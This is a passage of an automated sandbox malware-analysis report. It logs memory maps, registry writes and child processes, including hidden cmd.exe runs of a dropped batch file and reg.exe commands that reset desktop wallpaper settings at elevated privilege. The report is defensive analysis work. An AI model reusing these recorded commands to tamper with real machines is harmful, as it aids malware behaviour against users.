| sxs.dll | 0x74550000 | 0x745cffff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x745f0000 | 0x7461efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74620000 | 0x74632fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x74710000 | 0x7473afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74880000 | 0x7489afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x748f0000 | 0x7490cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74910000 | 0x74984fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76680000 | 0x767f4fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76ce0000 | 0x76d71fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76f30000 | 0x77019fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77020000 | 0x77055fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x77060000 | 0x770a1fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x771c0000 | 0x771cdfff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77670000 | 0x776f1fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x77700000 | 0x77757fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007eeee000 | 0x7eeee000 | 0x7eef0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eef1000 | 0x7eef1000 | 0x7eef3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eef4000 | 0x7eef4000 | 0x7eef6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eef7000 | 0x7eef7000 | 0x7eef9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eefa000 | 0x7eefa000 | 0x7eefcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eefd000 | 0x7eefd000 | 0x7eefffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ef00000 | 0x7ef00000 | 0x7effffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f000000 | 0x7f000000 | 0x7f022fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f025000 | 0x7f025000 | 0x7f025fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f026000 | 0x7f026000 | 0x7f028fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f029000 | 0x7f029000 | 0x7f02bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f02c000 | 0x7f02c000 | 0x7f02efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f02f000 | 0x7f02f000 | 0x7f02ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Wscript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = size |
|
1 | |
| Read | - | size = 267, size_out = 267 |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | show_window = SW_HIDE |
|
2 |
Module (14)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | amsi.dll | base_address = 0x744b0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x752c0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x74d30000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0x20000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x74df9ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiInitialize, address_out = 0x744b3d40 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiScanString, address_out = 0x744b40e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadedAPI, address_out = 0x74de4e60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadsFromDll, address_out = 0x74e60770 |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0x2b650 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x75454cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiUninitialize, address_out = 0x744b3f20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 257140 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 |
Process #13: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x348 |
| Parent PID | 0xf9c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
324
0x
364
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00900000 | 0x00952fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000dc0000 | 0x00dc0000 | 0x04dbffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04dd3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04de1fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x04de0000 | 0x04de9fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004df0000 | 0x04df0000 | 0x04e03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e90000 | 0x04e90000 | 0x04e93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ea0000 | 0x04ea0000 | 0x04ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04eb1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ec0000 | 0x04f7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x0501ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050b0000 | 0x050b0000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x051b0000 | 0x0528efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005390000 | 0x05390000 | 0x0539ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x053a0000 | 0x056d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76ed0000 | 0x76f2bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec90000 | 0x7ec90000 | 0x7ed8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed90000 | 0x7ed90000 | 0x7edb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edb5000 | 0x7edb5000 | 0x7edb5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edb9000 | 0x7edb9000 | 0x7edbbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edbc000 | 0x7edbc000 | 0x7edbefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edbf000 | 0x7edbf000 | 0x7edbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x900000 |
|
1 |
Process #14: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x374 |
| Parent PID | 0xf9c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
290
0x
81C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00900000 | 0x00952fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x04a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a10000 | 0x04a10000 | 0x04a1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a31fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x04a30000 | 0x04a39fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04ae3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004af0000 | 0x04af0000 | 0x04af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ce0000 | 0x04d9dfff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x04da0000 | 0x050d6fff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x050e0000 | 0x051befff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76ed0000 | 0x76f2bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e800000 | 0x7e800000 | 0x7e8fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e900000 | 0x7e900000 | 0x7e922fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e928000 | 0x7e928000 | 0x7e928fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e929000 | 0x7e929000 | 0x7e92bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e92c000 | 0x7e92c000 | 0x7e92efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e92f000 | 0x7e92f000 | 0x7e92ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x900000 |
|
1 |
Process #15: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Microsoft Office 15\alfred.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:24, Reason: Child Process |
| Unmonitor | End Time: 00:04:40, Reason: Self Terminated |
| Monitor Duration | 00:01:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x804 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3D4
0x
304
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e40000 | 0x00e40000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x00fd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00fe0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001070000 | 0x01070000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01080000 | 0x0113dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x0123ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001250000 | 0x01250000 | 0x0134ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000054b0000 | 0x054b0000 | 0x054bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x054c0000 | 0x057f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecf0000 | 0x7ecf0000 | 0x7edeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edf0000 | 0x7edf0000 | 0x7ee12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee13000 | 0x7ee13000 | 0x7ee13fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee14000 | 0x7ee14000 | 0x7ee14fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1a000 | 0x7ee1a000 | 0x7ee1cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1d000 | 0x7ee1d000 | 0x7ee1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
